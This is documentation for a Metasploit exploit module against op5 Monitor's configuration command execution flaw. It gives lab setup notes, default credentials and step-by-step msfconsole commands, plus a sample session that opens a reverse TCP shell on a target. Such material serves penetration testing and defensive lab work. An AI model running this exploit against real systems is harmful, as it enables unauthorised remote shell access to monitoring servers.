Op5 Config Exec - Metasploit Framework

Vulnerable Application

Official Source: op5.com Archived Copy: github

Creating A Testing Environment

Just a few quick notes on setting up a vulnerable lab with this software.

The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
Within php.ini, date.timezone = "America/New York" to date.timezone = "America/New_York" if you get php errors
You may need to register for a free license via an email challenge/verification

Verification Steps

Install the software, RHEL/CENTOS required (tested on CentOS 6)
Start msfconsole
Do: use exploit/linux/http/op5_config_exec
Do: set payload linux/x86/shell/reverse_tcp
Do: set rhost 192.168.2.31
Do: set lhost 192.168.2.229
Do: exploit
You should get a shell.

Options

PASSWORD

Password is 'monitor' by default.

USERNAME

Documentation was unclear on this. Installing just the app, the username was 'monitor' by default. However it looks like if you install the appliance it may be 'root'

Scenarios

  msf > use exploit/linux/http/op5_config_exec 
  msf exploit(op5_config_exec) > set verbose true
  verbose => true
  msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
  payload => linux/x86/shell/reverse_tcp
  msf exploit(op5_config_exec) > set rhost 192.168.2.31
  rhost => 192.168.2.31
  msf exploit(op5_config_exec) > set lhost 192.168.2.229
  lhost => 192.168.2.229
  msf exploit(op5_config_exec) > check
  
  [+] Version Detected: 7.1.9
  [+] The target is vulnerable.
  msf exploit(op5_config_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.2.229:4444 
  [*] Sending stage (36 bytes) to 192.168.2.31
  [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
  [*] Command Stager progress - 100.00% done (832/832 bytes)
  whoami
  monitor
  id
  uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0